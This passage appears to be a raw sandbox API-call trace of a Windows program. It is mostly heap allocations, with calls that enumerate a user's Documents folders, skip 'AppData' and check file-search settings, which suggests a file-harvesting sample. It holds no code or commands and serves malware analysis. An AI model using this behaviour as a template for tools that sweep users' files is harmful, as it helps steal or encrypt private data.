Flags=0x0, Size=0x20) returned 0x68df68 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfb8 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b3d8 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bf0 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b468 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b408 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df18 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b3a8 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c70 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de78 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b3c0 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c50 [0073.970] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3c0 | out: hHeap=0x650000) returned 1 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de50 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b3c0 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c30 [0073.970] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3c0 | out: hHeap=0x650000) returned 1 [0073.970] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df90 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b3c0 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c40 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b450 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b858 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b390 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cb0 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b480 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b420 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b438 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c60 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b3f0 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b498 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0073.971] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e008 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b498 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c20 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4b0 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ad0 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4c8 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690be0 [0073.971] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x764d38 [0073.971] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4c8 | out: hHeap=0x650000) returned 1 [0073.971] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.971] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ad0 | out: hHeap=0x650000) returned 1 [0073.971] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0073.972] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x77c6e0d2, ftCreationTime.dwLowDateTime=0x76b4b0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x76ac06, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x8990277, nFileSizeHigh=0xb8350, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="", cAlternateFileName="haဓ\x03\x10")) returned 0xffffffff [0073.972] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x764d38 | out: hHeap=0x650000) returned 1 [0073.972] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690be0 | out: hHeap=0x650000) returned 1 [0073.972] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4b0 | out: hHeap=0x650000) returned 1 [0073.972] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0073.972] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e008 | out: hHeap=0x650000) returned 1 [0073.972] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0073.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0073.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690be0 [0073.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c20 [0073.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.972] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0073.972] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.972] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690be0 | out: hHeap=0x650000) returned 1 [0073.972] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0073.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e008 [0073.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b498 [0073.972] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b4b0 [0073.972] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0073.972] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4b0 | out: hHeap=0x650000) returned 1 [0073.972] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e008 | out: hHeap=0x650000) returned 1 [0073.972] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b858 | out: hHeap=0x650000) returned 1 [0073.972] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0073.972] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c50 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de78 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b450 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3c0 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df90 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3a8 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfe0 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c30 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de50 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df40 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b408 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b468 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3d8 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b420 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b480 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b390 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cb0 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3f0 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b438 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c60 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dea0 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0073.973] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.974] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ca0 | out: hHeap=0x650000) returned 1 [0073.974] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0073.974] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0073.974] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x764cc0 | out: hHeap=0x650000) returned 1 [0073.974] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.974] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2b8 | out: hHeap=0x650000) returned 1 [0073.974] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0073.974] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.974] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0073.974] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b360 | out: hHeap=0x650000) returned 1 [0073.974] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b330 | out: hHeap=0x650000) returned 1 [0073.974] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0073.974] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0073.974] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.974] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.974] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.974] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.974] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b330 [0073.974] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ca0 [0073.974] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ca0 | out: hHeap=0x650000) returned 1 [0073.974] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x657690, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0073.974] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b360 [0073.974] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.974] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ca0 [0073.974] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b330 | out: hHeap=0x650000) returned 1 [0073.974] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0073.974] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.975] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0073.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Pictures", cchCount1=11, lpString2="AppData", cchCount2=7) returned 3 [0073.975] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0073.975] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x77c6e0d2, ftCreationTime.dwLowDateTime=0x76b498, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x76ac06, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x8990277, nFileSizeHigh=0xb8379, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="", cAlternateFileName="haဓ\x03\x10")) returned 0xffffffff [0073.975] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x61e5f4, dwReserved1=0x657690, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0073.975] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.975] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.975] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cb0 [0073.975] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0073.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Shapes", cchCount1=9, lpString2="AppData", cchCount2=7) returned 3 [0073.975] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0073.975] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8af8 [0074.014] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.014] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0074.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0074.014] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4c8 [0074.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ad0 [0074.015] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 1 [0074.015] TranslateMessage (lpMsg=0x61e69c) returned 0 [0074.015] DispatchMessageW (lpMsg=0x61e69c) returned 0x0 [0074.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0074.015] Shell_NotifyIconW (dwMessage=0x1, lpData=0x61dd38) returned 1 [0074.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.016] KillTimer (hWnd=0x4011e, uIDEvent=0x1) returned 1 [0074.016] SetTimer (hWnd=0x4011e, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0074.016] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c20 [0074.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690be0 [0074.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690be0 | out: hHeap=0x650000) returned 1 [0074.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0074.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.017] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.017] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.017] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b38 [0074.017] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.017] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.017] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e008 [0074.017] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b498 [0074.017] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c20 [0074.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0074.017] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4b0 [0074.017] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c20 [0074.017] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4c8 [0074.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0074.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e008 | out: hHeap=0x650000) returned 1 [0074.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4b0 | out: hHeap=0x650000) returned 1 [0074.017] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.017] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.017] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.017] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690be0 [0074.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690be0 | out: hHeap=0x650000) returned 1 [0074.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.018] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690be0 [0074.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690be0 | out: hHeap=0x650000) returned 1 [0074.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0074.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b78 [0074.018] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4b0 [0074.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690be0 [0074.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b498 [0074.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cc0 [0074.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6b9a28 [0074.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b498 | out: hHeap=0x650000) returned 1 [0074.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cd0 [0074.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b498 [0074.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0074.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ce0 [0074.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.018] HeapFree (in: hHeap=0x650000, 